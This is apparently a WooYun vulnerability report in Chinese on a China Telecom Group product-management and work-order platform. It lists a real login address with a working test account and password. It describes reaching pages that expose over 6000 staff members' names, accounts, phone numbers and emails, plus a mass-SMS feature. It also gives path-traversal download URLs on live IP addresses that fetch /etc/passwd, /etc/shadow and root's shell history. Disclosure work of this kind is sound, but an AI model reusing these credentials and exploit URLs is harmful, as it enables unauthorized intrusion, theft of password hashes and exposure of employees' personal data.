WooYun.org

#中国电信集团公司产品管理平台
#登录点：
http://42.99.16.16:8080/productmanager/
#账户密码：test 1qaz2wsx
本来这个本身的账户好像已经没有什么权限了，什么也看不了。突然在左下角又发现了两个。。
#中国电信集团业务工单系统，中国电信集团产品开发管理平台
两个平台不能同时登录
#第一个，中国电信集团业务工单系统，在默认平台里面的点击右下角业务单管理专区（GET提交密码..）
跳转到http://218.80.215.200:8080/pms/MainAction.do
点击http://218.80.215.200:8080/pms/index.jsp?type=workSheet
#其中基础信息维护部分
左边可以发现， 查看管理员通讯录，项目组通讯录。
其中用户查询（还需要再点击下右边的查询）可以看全部人员信息，姓名，账户，手机，邮箱，职位，权限。有6000多个。。
还有个群发短信功能，点击组织结构就出来了。。。。
#业务单，协调单专区点击查询可以查看所有...最近的是今天的...（还得点下查询）
#任意上传，协调单新建好像可以任意上传。但是返回的是一个参数下载地址。好了，因为这个。发现了任意下载.....
#任意下载漏洞
http://218.80.215.200:8080/pms/CommonFileDownloadAction.do?fileName=../../../../../etc/passwd
http://218.80.215.200:8080/pms/CommonFileDownloadAction.do?fileName=../../../../../etc/shadow
http://218.80.215.200:8080/pms/CommonFileDownloadAction.do?fileName=../../../../../root/.bash_history 这个能被下载什么都暴漏了。
不弄了，反正根据这个权限的任意下载能发现太多东西了
#另一个平台(返回第一个平台点击进去)
http://218.80.215.215/MainDefault.aspx
能够查看最近的产品xxx等功能。也能上传。没有深入